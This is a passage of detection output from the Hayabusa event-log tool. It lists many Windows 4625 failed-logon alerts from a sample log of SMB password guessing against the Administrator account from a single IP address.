Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : 